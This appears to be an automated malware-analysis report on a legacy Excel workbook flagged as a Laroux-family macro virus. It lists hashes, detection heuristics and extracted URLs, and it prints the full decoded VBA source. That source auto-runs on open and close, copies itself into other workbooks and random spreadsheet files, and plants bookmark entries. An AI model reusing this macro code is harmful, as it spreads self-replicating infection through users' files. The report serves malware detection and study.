Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6c962b7e19c0f451…

MALICIOUS

Office (OLE)

71.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 76b45b0f1f1887ed6f49556ce528749d SHA-1: 5290510e148d288beb5e6be11071d074cf7b6530 SHA-256: 6c962b7e19c0f451c1c46dde92f7f788df245e123383315a4b8d3a7839a0539e
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros, including Auto_Open and Auto_Close, which are indicative of macro-based malware. The heuristics specifically flag it as a potential Excel 5 Laroux macro-virus. The script attempts to copy itself to other workbooks and includes embedded URLs, suggesting a mechanism for spreading or downloading additional payloads. The presence of Auto_Open and Auto_Close macros indicates an attempt to execute code automatically when the workbook is opened or closed.

Heuristics 5

  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://groupebelier/ In document text (OLE body)
    • http://www.groupebelier.ch�In document text (OLE body)
    • http://www.groupebelier.chIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3732 bytes
SHA-256: 25b727c5bcf298897e034cb85a8d166ef998bcfaba9be9669e804af1d00fda87
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Béliers"

Rem ************************************************************************************************

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"

On Error Resume Next

If Right(Date, 2) = "99" Then action

fichiercourant = ActiveWorkbook.Name
    
For a = 1 To Workbooks.Count
 nbfeuilles = Workbooks(a).Sheets.Count
 ecrit = True
 For b = 1 To nbfeuilles
   If Workbooks(a).Sheets(b).Name = "Béliers" Then
    ecrit = False
   End If
 Next b
 If ecrit Then
  Workbooks(fichiercourant).Modules("Béliers").Copy after:=Workbooks(a).Sheets(nbfeuilles)
  Workbooks(a).Sheets("Béliers").Visible = False
  Workbooks(a).Sheets(1).Select
 End If
Next a
   
Workbooks(fichiercourant).Activate
ecrit_fichier

End Sub
  
Rem ************************************************************************************************

Sub Auto_close()
Attribute Auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
    
On Error Resume Next

fichiercourant = ActiveWorkbook.Name
    
For a = 1 To Workbooks.Count
 nbfeuilles = Workbooks(a).Sheets.Count
 ecrit = True
 For b = 1 To nbfeuilles
   If Workbooks(a).Sheets(b).Name = "Béliers" Then
    ecrit = False
   End If
 Next b
 If ecrit Then
  Workbooks(fichiercourant).Modules("Béliers").Copy after:=Workbooks(a).Sheets(nbfeuilles)
  Workbooks(a).Sheets("Béliers").Visible = False
  Workbooks(a).Sheets(1).Select
 End If

Next a
   
Workbooks(fichiercourant).Activate
ecrit_fichier
   
End Sub

Rem ************************************************************************************************
Sub ecrit_fichier()
Attribute ecrit_fichier.VB_ProcData.VB_Invoke_Func = " \n14"

On Error Resume Next

fichiercourant = ActiveWorkbook.Name
chemincourant = CurDir()

ChDrive "c"
ChDir ("c:\mes Documents")
fichier = Dir("*.xls")

n = 1

Do While fichier <> ""
  n = n + 1
  fichier = Dir()
Loop

b = Int(n * Rnd)
b = b - 1

ChDrive "c)"
ChDir ("c:\Mes Documents")
fichier = Dir("*.xls")

For a = 1 To b
 fichier = Dir()
Next a

If (fichier <> fichiercourant) And (fichier <> "") Then
 Workbooks.Open (fichier)
 feuillecourante = Workbooks(fichier).ActiveSheet.Name
 nbfeuilles = Workbooks(fichier).Sheets.Count
 ecrit = True
 
 For b = 1 To nbfeuilles
   If Workbooks(fichier).Sheets(b).Name = "Béliers" Then
    ecrit = False
   End If
 Next b
 
 If ecrit Then
  Workbooks(fichiercourant).Sheets("Béliers").Copy after:=Workbooks(fichier).Worksheets(nbfeuilles)
  Workbooks(fichier).Sheets("Béliers").Visible = False
  Workbooks(fichier).Sheets(feuillecourante).Select
 End If
 
 Workbooks(fichier).Save
 Workbooks(fichier).Close
End If

ChDrive (chemincourant)

End Sub

Rem ************************************************************************************************

Sub action()
Attribute action.VB_ProcData.VB_Invoke_Func = " \n14"

On Error Resume Next

Open "c:\Program files\netscape\navigator\program\bookmark.htm " For Append As #1
 Print #1, "    <DT><A HREF=""http://groupebelier/"" ADD_DATE=""890674206"" LAST_VISIT=""896388845"" LAST_MODIFIED=""890674114"">Groupe Bélier</A>"
Close #1

Open "c:\Program files\netscape\navigator\bookmark.htm " For Append As #1
 Print #1, "    <DT><A HREF=""http://groupebelier/"" ADD_DATE=""890674206"" LAST_VISIT=""896388845"" LAST_MODIFIED=""890674114"">Groupe Bélier</A>"
Close #1

Open "c:\windows\Favoris\Groupe Bélier.url" For Append As #1
 Print #1, "[InternetShortcut]"
 Print #1, "URL=http://www.groupebelier.ch"
Close #1

End Sub

Rem ************************************************************************************************

Open this report in the interactive analyzer, or submit your own file for analysis.